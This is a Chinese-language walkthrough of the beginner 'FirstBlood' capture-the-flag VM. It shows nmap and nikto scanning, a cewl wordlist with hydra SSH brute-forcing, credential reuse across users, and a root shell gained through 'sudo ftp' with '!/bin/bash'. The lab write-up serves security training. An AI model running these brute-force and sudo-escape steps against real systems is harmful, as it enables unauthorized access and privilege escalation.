绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了
1、找到靶机ip:192.168.74.130
nmap -sn 192.168.74.0/24
2、扫描靶机端口,得到80端口和60022端口(ssh服务)
root@kali:~# nmap -A -p- 192.168.74.130
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.74.130
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/johnnyrambo/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to FirstBlood!
60022/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:01:d8:27:53:50:d9:e1:9a:cb:9d:1e:4c:b0:a5:ae (RSA)
| 256 4b:c8:77:49:db:5f:38:7f:36:e1:49:da:a4:a1:7c:5d (ECDSA)
|_ 256 36:c8:65:e1:45:9a:9c:66:c9:c9:21:c4:5a:25:4d:76 (ED25519)
MAC Address: 00:0C:29:0E:84:DE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/25%OT=80%CT=1%CU=39338%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5F6D7C7E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.74.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds3、先访问80端口,进来就是一大段的英文,关键点就是提示我们ctrl+U查看源码
就跟着做就行了,源码中发现一个rambo.html文件
访问得到又是一大段英文,提示我们使用nmap不加参数扫描的时候只能看到80端口开放,但是加上-p-就能看到另一个端口,这里其实我的习惯就是扫全端口,所以没啥用,还有就是使用nikto命令时会发现一个目录
下面是执行nikto命令的结果,得到了一个johnnyrambo目录,但是其实我们之前扫描的时候已经扫出来robots.txt文件了,所以这一步其实也可以不做
root@kali:~# nikto -h http://192.168.74.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.74.130
+ Target Hostname: 192.168.74.130
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry ' /johnnyrambo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2020-09-25 15:39:22 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
访问这个目录果然还是一大波英文,关键的信息就是红色字体上面的,先使用cewl生成一个字典,然后就可以去爆破ssh密码了
3、使用命令生成字典,爆破之前我们还需要知道用户名,这里有一个讨巧的办法就是靶机开启之后在登陆界面是可以看到所有的登录用户的,根据前面的信息很容易猜到是johnny,还有端口也需要注意指定为之前扫到的60022,所以接下来就可以直接使用hydra进行爆破了,很快就找到了密码
root@kali:~# cewl -w words.txt -d 1 -m 5 http://192.168.74.130/johnnyrambo/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# wc -l words.txt
137 words.txt
root@kali:~# hydra -l johnny -P words.txt -s 60022 ssh://192.168.74.130
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-25 15:47:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 137 login tries (l:1/p:137), ~9 tries per task
[DATA] attacking ssh://192.168.74.130:60022/
[60022][ssh] host: 192.168.74.130 login: johnny password: Vietnam
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
root@kali:~#
这里其实第2步也给了提示,就是访问ssh.html页面能够得到下一步提示和用户名
4、使用johnny/Vietnam用户名和密码ssh登录上去,查看家目录下的文件
root@kali:~# ssh 192.168.74.130 -p 60022
The authenticity of host '[192.168.74.130]:60022 ([192.168.74.130]:60022)' can't be established.
ECDSA key fingerprint is SHA256:9NWBNQ2bI/RnipoZ6hHKjL8BZq69S71dcT42eAnvjpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.74.130]:60022' (ECDSA) to the list of known hosts.
johnny@192.168.74.130's password: Vietnam(不可见)
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Fri Sep 18 15:29:53 2020 from 192.168.86.109
johnny@firstblood:~$ ls
README.txt
发现一个README.txt文件,查看内容提示我们去查看一下配置文件得到网站的根目录
johnny@firstblood:~$ cat README.txt
Nice job! You're cruising along nicely!
When we find ourselves on a web server, we want to check out the web directory.
In case you haven't figured it out, this server is running Nginx. For this particular
setup, I've left things at the default. If we look in the configuration file, we can
view the location of the web directory:
cat /etc/nginx/sites-enabled/default
That's kind of noisy in the output. We can clean it up with the following:
cat /etc/nginx/sites-enabled/default | grep -v "#"
-v is an invert match and will essentially remove all of the comment (#) lines.
When we clean it up, the line starting with "root" points to the web directory.
Move into the web directory and see if there are any files to read...
5、查看配置文件得到网站根目录(其实就是默认的),进入到那个目录下,又发现了一个README.txt
johnny@firstblood:~$ cat /etc/nginx/sites-enabled/default | grep -v "#"
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
}
johnny@firstblood:~$ cd /var/www/html
johnny@firstblood:/var/www/html$ ls
index.nginx-debian.html johnnyrambo rambo.html README.txt robots.txt查看内容提示我们找到另一个可读的README.txt
johnny@firstblood:/var/www/html$ cat README.txt
Hack the Planet!
Nice work!
I've hidden a file on this server which is readable by you. Seems like a needle in the haystack, no?
We can use the "find" command to find files. If I wanted to find the /etc/passwd file:
find /etc -name passwd -print
^^ would generate some permission denied errors along with the correct response.
We can redirect errors:
find /etc -name passwd -print 2>/dev/null
That last part: 2>/dev/null
^^ will redirect errors to the same place where unicorn crap ends up. It's magic. Don't question me.
If we run the following:
find / -type f -readable 2>/dev/null
We are going to get a LOT of noise.
However, if we fine tune this a bit:
find / -type f -readable 2>/dev/null | grep README.txt
-type f stands for type file
-readable stands for readable by this current user
| grep README.txt is a way to redirect the output to grep for a string match, the string being README.txt
We can narrow down the list. Find the file, read the contents.
6、使用find命令查找到另一个README.txt文件
johnny@firstblood:/var/www/html$ find / -type f -readable 2>/dev/null | grep README.txt
/opt/README.txt
/var/www/html/README.txt
/home/johnny/README.txt
查看内容给了另一个用户名和账号
johnny@firstblood:/var/www/html$ cat /opt/README.txt
There's another user on this server that might have greater privileges:
username: blood
password: HackThePlanet2020!!
You can either switch users or ssh as the new user. If you know how to do both, pick one.
If you only know how to SSH, learn to switch users.
7、直接切换到blood用户,进入到它的家目录,也发现一个README.txt文件,提示在/home目录下还有一个用户,要我们尝试读取这个用户家目录下的文件
johnny@firstblood:/var/www/html$ su blood
Password: HackThePlanet2020!!(不可见)
blood@firstblood:/var/www/html$ cd ~
blood@firstblood:~$ ls
README.txt
blood@firstblood:~$ cat README.txt
I didn't think you needed to be told about the README.txt file.
I'm really stoked that you're cruising along. Nice work!
If you move into the /home directory, we can see the home directories for the other
users on this server. There's a user directory with some text files. Attempt to
read both files.
切换到/home目录下,发现sly目录是可读的,进入后发现两个文件,但是只有一个可读
blood@firstblood:~$ cd /home
blood@firstblood:/home$ ls -la
total 24
drwxr-xr-x 6 root root 4096 Sep 18 14:24 .
drwxr-xr-x 23 root root 4096 Sep 18 11:26 ..
drwxr-xr-x 4 blood blood 4096 Sep 18 15:23 blood
drwx------ 17 firstblood firstblood 4096 Sep 18 11:45 firstblood
drwxr-xr-x 6 johnny johnny 4096 Sep 18 15:24 johnny
drwxr-xr-x 4 sly sly 4096 Sep 18 15:26 sly
blood@firstblood:/home/sly$ ls -l
total 8
-rw-rw-r-- 1 sly sly 583 Sep 18 15:26 README_FIRST.txt
-rw------- 1 sly sly 304 Sep 18 15:25 README.txt
查看README_FIRST.txt文件内容,提示使用sudo -l命令列举权限
blood@firstblood:/home/sly$ cat README_FIRST.txt
Obviously, you're able to read this file but you're unable to read the other because
you don't have permissions. If you perform an: ls -al
You can see that only the user sly has permission to read README.txt
Hold that thought for a moment...
In some instances we need to perform tasks as other users or even root sometimes.
We can see if we have those permissions by typing:
sudo -l
-l stands for list, as in -- list our permissions
We discover that we have the ability to run a command as sly that might help us.
Figure out how to execute that command as the user sly.
8、使用sudo -l命令发现可以使用sly的身份查看上面的README.txt文件,在里面发现了sly的密码和一个网站说可能对提权到root有帮助,然后还是需要用到sudo命令
blood@firstblood:/home/sly$ sudo -l
Matching Defaults entries for blood on firstblood:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User blood may run the following commands on firstblood:
(sly) /bin/cat /home/sly/README.txt
(root) NOPASSWD: /usr/bin/esudo-properties
blood@firstblood:/home/sly$ sudo -u sly /bin/cat /home/sly/README.txt
[sudo] password for blood: HackThePlanet2020!!(不可见)
In case I forget, my password is: SylvesterStalone
PS -- I think root gave us sudo privileges. I think this might be dangerous though
because I found a website: https://gtfobins.github.io/
It shows a possible privilege escalation for root. I'm totally going to check out
root's files. hint hint
9、切换到sly用户,使用sudo -l命令列举权限,发现有可以用任意登录用户身份执行的ftp命令
blood@firstblood:/home/sly$ su sly
Password: SylvesterStalone(不可见)
sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sly may run the following commands on firstblood:
(ALL) /usr/bin/ftp
(root) NOPASSWD: /usr/bin/esudo-properties
sly@firstblood:~$那直接就可以使用ftp命令进行提取了,那个网站就是提供了很多命令提权的方式,提权到root之后进入到家目录读到最后的README.txt
sly@firstblood:~$ sudo ftp
[sudo] password for sly:SylvesterStalone(不可见)
ftp> !/bin/bash
root@firstblood:~# cd /root
root@firstblood:/root# ls
README.txt
root@firstblood:/root# cat README.txt
______ _ _ ______ _ _
| ___(_) | | | ___ \ | | |
| |_ _ _ __ ___| |_| |_/ / | ___ ___ __| |
| _| | | '__/ __| __| ___ \ |/ _ \ / _ \ / _` |
| | | | | \__ \ |_| |_/ / | (_) | (_) | (_| |
\_| |_|_| |___/\__\____/|_|\___/ \___/ \__,_|
____ ______ _ _ ____
\ \ \ | ___ \ | | | | / / /
\ \ \ | |_/ /___ ___ | |_ ___ __| | / / /
> > > | // _ \ / _ \| __/ _ \/ _` | < < <
/ / / | |\ \ (_) | (_) | || __/ (_| | \ \ \
/_/_/ \_| \_\___/ \___/ \__\___|\__,_| \_\_\
I hope you enjoyed this box. I wanted to create something
on the easier side because I know how frustrating and
rewarding the process can be. If you liked this box
please reach out to me on Twitter and let me know:
@iamv1nc3nt
10、总结
这个靶机的难度和指导性挺适合初学者和对这方面感兴趣却刚起步的玩一玩!
扫一扫
549
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
